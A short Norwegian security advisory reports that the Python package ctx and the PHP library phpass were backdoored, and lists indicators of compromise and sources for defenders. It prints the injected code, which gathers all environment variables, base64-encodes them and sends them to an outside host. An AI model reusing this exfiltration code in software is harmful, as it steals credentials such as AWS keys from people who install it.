Python-biblioteket ctx er infisert med ondsinnet kode
Pakken er nå fjernet fra pypi
Pakken ctx er ikke lenger tilgjengelig på pypi
TL;DR
Dersom du har kjørt pip install etter 21. mai, og har AWS-nøkler liggende, bør de roteres umiddelbart.
CTX, en Python-pakke som brukes for å støtte dot notation på dictionaries, fikk en oppdatering 21. mai - den første på åtte år.
Oppdateringen inneholder onsindet kode som ser ut til å høste inn og videresende miljøvariabler. Enkelte versjoner jaktet spesifikt etter AWS_SECRET_ACCESS_KEY.
1 def __init__(self):
2 self.sendRequest()
3 .
4 . # code that performs dict access
5 . # please DO NOT RUN THIS CODE !
6
7 def sendRequest(self):
8 string = ""
9 for _, value in environ.items():
10 string += value+" "
11
12 message_bytes = string.encode('ascii')
13 base64_bytes = base64.b64encode(message_bytes)
14 base64_message = base64_bytes.decode('ascii')
15
16 response = requests.get("https://anti-theft-web.herokuapp.com/hacked/"+base64_message)
Samme gjelder for phpass
Den samme ondsinnede koden ble også injisert i PHP-biblioteket phpass.
IoC (Indicators of Compromise)
Dersom du har logger du kan søke gjennom, kan du lete etter følgende:
- anti-theft-web.herokuapp.com
- 3.216.88.24
- 37129d145a310d64369e7d2741b4d51eb3a85193 (SHA1 hash of backdoored ctx-0.1.2.tar.gz)
- f98204e2bfceef20c85f26e0f5c6661a8639e56d (SHA1 hash of backdoored ctx-0.2.2.tar.gz)
- a73d3d7f1a57d61d17763747a7eaf8b24332c5b6 (SHA1 hash of backdoored ctx-0.2.6.tar.gz)
Kilder
- https://www.securityweek.com/pypi-served-malicious-version-popular-ctx-python-package
- https://thehackernews.com/2022/05/pypi-package-ctx-and-php-library-phpass.html
- https://www.reddit.com/r/Python/comments/uwhzkj/i_think_the_ctx_package_on_pypi_has_been_hacked/
- https://isc.sans.edu/forums/diary/ctx+Python+Library+Updated+with+Extra+Features/28678/